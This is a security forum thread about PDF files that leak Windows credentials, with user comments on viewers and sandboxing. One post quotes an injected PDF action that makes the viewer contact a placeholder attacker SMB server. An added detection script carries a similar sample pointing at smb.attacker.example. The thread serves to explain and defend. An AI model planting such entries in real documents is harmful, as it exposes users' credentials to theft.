PDF Files Can Be Abused to Steal Windows Credentials

Discussion in 'other security issues & news' started by mood, Apr 27, 2018.

  1. mood

    mood Updates Team

    Joined:
    Oct 27, 2012
    Posts:
    9,457
    PDF Files Can Be Abused to Steal Windows Credentials
    April 27, 2018
    https://www.bleepingcomputer.com/news/security/pdf-files-can-be-abused-to-steal-windows-credentials/
     
  2. mary7

    mary7 Registered Member

    Joined:
    Oct 17, 2017
    Posts:
    53
    Location:
    Italy
I use Sumatra PDF; is it also vulnerable?
     
  3. Minimalist

    Minimalist Registered Member

    Joined:
    Jan 6, 2014
    Posts:
    10,313
    Location:
    .
I would also like to know if it works if scripting is disabled in the PDF viewer.
If the program doesn't need a network connection, blocking it in the FW would also help.
     
  4. mood

    mood Updates Team

    Joined:
    Oct 27, 2012
    Posts:
    9,457
It is not triggered by JavaScript.
The PDF file is modified (a malicious entry is injected), and the action is triggered by opening the PDF file.
    Code:
    % **** malicious entry ****
    /AA <<
      /O <<
        /F (\\\\ <attacker_smb_server> \\ <dummy_file>)
        /D [ 0 /Fit ]
        /S /GotoE
      >>
    >>
    % *****
    
     
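A detection-side illustration of the entry quoted above, added here and not part of the thread or the linked article: it scans a PDF's raw objects for GotoE/GotoR/Launch actions whose /F file specification points at a UNC path or URL, decoding PDF string escapes first so that the doubled backslashes in the posted snippet (or their octal equivalents) are compared as the path the viewer would actually open. The host name in the constructed sample is a placeholder.

```python
import re

# PDF literal strings escape "\" as "\\", so the UNC path \\host\share from the post
# above is stored as "\\\\host\\share" inside "( ... )"; \ddd octal escapes spell the same bytes.
ACTION_RE = re.compile(rb"/S\s*/(GotoE|GotoR|Launch)\b")
FILE_RE = re.compile(rb"/F\s*\(((?:[^()\\]|\\.)*)\)")
# Innermost dictionaries only: an action dict with an inline /F string has no nested << >>.
DICT_RE = re.compile(rb"<<((?:(?!<<|>>).)*)>>", re.DOTALL)
ESCAPES = {b"n": "\n", b"r": "\r", b"t": "\t", b"b": "\b", b"f": "\f"}

def unescape_pdf_string(raw: bytes) -> str:
    """Decode the escapes inside a PDF literal string (the bytes between the parentheses)."""
    out, i = [], 0
    while i < len(raw):
        if raw[i:i + 1] != b"\\" or i + 1 == len(raw):
            out.append(raw[i:i + 1].decode("latin-1"))
            i += 1
            continue
        octal = re.match(rb"[0-7]{1,3}", raw[i + 1:])
        if octal:                                   # \ddd
            out.append(chr(int(octal.group(), 8)))
            i += 1 + len(octal.group())
        else:                                       # \\ \( \) \n ...
            out.append(ESCAPES.get(raw[i + 1:i + 2], raw[i + 1:i + 2].decode("latin-1")))
            i += 2
    return "".join(out)

def is_remote(target: str) -> bool:
    # UNC (\\host\share), forward-slash UNC and URL-style targets all make the viewer leave the host.
    return (target.startswith("\\\\") or target.startswith("//")
            or re.match(r"[a-z][a-z0-9+.-]*://", target, re.I) is not None)

def find_remote_file_actions(pdf: bytes) -> list:
    """Return (action type, decoded target, byte offset) for every action whose /F points off-host."""
    findings = []
    for d in DICT_RE.finditer(pdf):
        action, fspec = ACTION_RE.search(d.group(1)), FILE_RE.search(d.group(1))
        if action and fspec:
            target = unescape_pdf_string(fspec.group(1))
            if is_remote(target):
                findings.append((action.group(1).decode(), target, d.start()))
    return findings

# Constructed sample: a catalog with the post's /AA /O structure (placeholder host), plus a local GotoE.
SAMPLE_PDF = (
    b"%PDF-1.7\n1 0 obj\n<< /Type /Catalog /Pages 2 0 R\n"
    rb"/AA << /O << /F (\\\\smb.attacker.example\\share\\dummy.pdf) /D [ 0 /Fit ] /S /GotoE >> >>"
    b"\n>>\nendobj\n3 0 obj\n<< /S /GotoE /F (appendix.pdf) /D [ 0 /Fit ] >>\nendobj\n"
)
```

Running `find_remote_file_actions(SAMPLE_PDF)` flags only the catalog's GotoE entry and leaves the local appendix.pdf reference alone. The scan works on raw, uncompressed objects; actions inside FlateDecode object streams or /F given as a file-specification dictionary would need the streams inflated and the nested dictionary followed first.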
  5. PrinceYann

    PrinceYann Registered Member

    Joined:
    Nov 29, 2015
    Posts:
    37
    I bet machine name and user name can leak via DNS even if NTLM SSO is disabled.
     
  6. bo elam

    bo elam Registered Member

    Joined:
    Jun 15, 2010
    Posts:
    4,958
    Location:
    Nicaragua
    I think the way I open PDF files is pretty safe. Always sandboxed. When I open a PDF while browsing, the PDF file runs in my Firefox sandbox outside the browser; PDF files don't run within Firefox, so they can't use Firefox as a vehicle to phone home. Foxit, my PDF reader, is not allowed access to the internet. And when I open PDF files from the hard drive, PDF files run in a dedicated sandbox where only Foxit is allowed to run and all programs are forbidden internet access. That's secure.

    Bo
     
  7. wolfrun

    wolfrun Registered Member

    Joined:
    Jul 26, 2009
    Posts:
    592
    Location:
    Canada
    Same as you, Bo. Only I use SumatraPDF as the only difference.
     